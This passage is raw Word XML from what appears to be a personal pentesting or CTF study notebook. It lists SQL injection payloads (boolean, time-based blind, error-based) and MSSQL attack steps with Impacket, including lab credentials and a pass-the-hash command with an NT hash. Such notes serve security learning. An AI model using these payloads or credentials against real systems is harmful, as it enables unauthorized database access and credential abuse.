        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Returns error page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based Blind SQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' AND IF(1=1, SLEEP(5), NULL)-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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C3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Force the database to throw errors containing valuable information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 1, extractvalue(1,concat(0x7e,(SELECT database()),0x7e)), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CA">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1s1a6fa3ylf8" w:id="201"/>
      <w:bookmarkEnd w:id="201"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SQL Server (mssql) (ms-sql-s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId513">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId514">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Databases in MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1333"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">master, tempdb, model, and msdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are default databases, so they often don't have important stuff, but feel free to check anyway</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Impacket tools, specifically mssqlclient.py. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect using impacket-mssqlclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab123 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1026"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">--windows-auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag forces NTLM authentication (as opposed to Kerberos)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DF">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect using mssqlclient.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd impacket/examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mssqlclient.py [username]:[password]@[domain]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how to connect using username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is how they connected in the Escape HTB</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 mssqlclient.py [USERNAME]@{TARGET_IP} -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sometimes it doesn't work without -windows-auth, so try with and without</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="423"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This flag is specified to use Windows Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pass the hash with mssqlclient.py:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1308"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient celia.almeda@10.10.196.142 -hashes :e728ecbadfb02f51ce8eed753f3ff3fd -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1308"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I figured it out by looking at the help output in terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1308"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Pretty standard for impact</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to specify port:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="796"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-port 1433</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_7q3vcr20l58z" w:id="202"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">General mssql</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">As a first step we need to check what is the role we have in the server. We will use the command found in the above </w:t>
      </w:r>
      <w:hyperlink r:id="rId515">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT is_srvrolemember('sysadmin');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it outputs "1", then it's true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F4">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
